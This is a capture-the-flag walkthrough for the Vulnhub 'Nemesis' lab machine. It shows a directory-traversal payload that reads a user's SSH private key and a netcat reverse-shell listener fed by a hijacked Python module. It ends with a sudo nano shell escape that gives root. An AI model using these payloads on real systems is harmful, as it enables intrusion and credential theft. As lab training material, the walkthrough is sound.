**IA: Nemesis (1.0.1)**
*Vulnhub Walkthrough*
#alperenugurlu
First of all, we learn the ‘IP’ address of the machine. **
root@kali:~#‘nmap 10.0.2 / 24’ or ‘netidscover -r 10.0.2 / 24’ parameters,
We discovered our IP address.
*The next step is nmap service and version detection.
What attracts my attention here are the Priority ports 80 and 52846.
Because http service is running at port 80. This tells us it’s a website. The ssh server on port 52846 has been left open. We will probably need to provide our connections from here. Our Attack Map took shape gradually. =)
Our next step is to monk secret directories with dirb.
I’ve scanned with Dirb. I found that access to all useful files was restricted. Then I scanned them with additional nikto and gobuster tools. I could not reach any useful result.
When the roads are blocked, it is time to tamper with the website. =)
Tried to access port ’10 .0.2.41: 52845 ‘. Remember, ‘nginx’ was running in the ‘nmap’ scan. I thought I could get something here.
While tinkering inside the site,
I saw that there is a message writing section in the ‘Contact’ tab. When this kind of thing happens, it often comes to my mind that there are LFI or Directory Traversal vulnerabilities. I’ve exploited for the LFI. AND the result is as I want!
I have come across with the situations that I have encountered in my researches on the internet and the ‘id_rsa’ openssh private key in the ‘.ssh’ in the ctfs that I solved before. So I’m doing a search here with the LFI vulnerability.
exploit: ../../../../home/thanos/.ssh/id_rsa
and I got what I wanted =)
example lets go =)
root@kali:~# nano id_rsa
Now we have everything for ssh connection. Let’s get connected. !
root@kali:~# ssh -i id_rsa thanos@10.0.2.41 -p 52846
Finally we got inside =)
We are using the ls -la command. We see the areas we can go to.
With the command cat flag1.txt, we get our first flag. =)
Friends, we came to the real trouble =)
In this section we will focus on escalation and materials that we can use within this link.
There is a python file next to flag.txt. When I tried to open it as ‘backup.py’ python gave an error message. We got an error for a reason like Zip python plugin.
I spent about one and a half hours to overcome this problem. =) And as a result I encountered on the internet, a code came out that I can listen with ‘nc (netcat)’. It was telling me to save it as ‘zipfile.py’ and run it.
Now, we open the python file we wrote here with the ‘cat’ command. And we listen with ‘nc’.
root@kali:~# nc -nvlp 4444
We have regained the remote connection. We saw all the files with the ‘ls -la’ command. Yes, our second flag is here. We got it with the command ‘cat flag2.txt’.!
We still haven’t been ‘root’. And we have no information about ‘root’.
There is a ‘root.txt’ folder in the directory we are in. I am immediately taking it through with the command ‘cat root.txt’.
Here ‘encrypt.py’ says there is information about the encryption algorithm inside the python file. With the command ‘cat encrypt.py’ we reached the file option. We found that ‘affine_encrypt’ algorithm is used in its content. And in return he gave an encrypt password.
I did a search with Google for ‘affine decrypt’. I found such a site. I copied the password I found. And it has been decrpyt. The code we found was about ‘carlos’.
Now we go to the terminal where we connect with ssh. Here we enter the password we found for carlos with the ‘su carlos’ command. Then I am trying to upgrade the authority with the ‘sudo -l’ command. I see the / bin / nano … directory and command related to root.
There is a site that I use constantly for such problems. https://gtfobins.github.io/
I get what I want as a result of a research like ‘nano suid’ on this site.
We are now approaching the end. =)
‘sudo nano
^ R ^ X
reset; sh 1> & 0 2> & 0 ‘
We have increased the authority with the command.
We got our last flag with ‘cat root.txt’. We won! =)
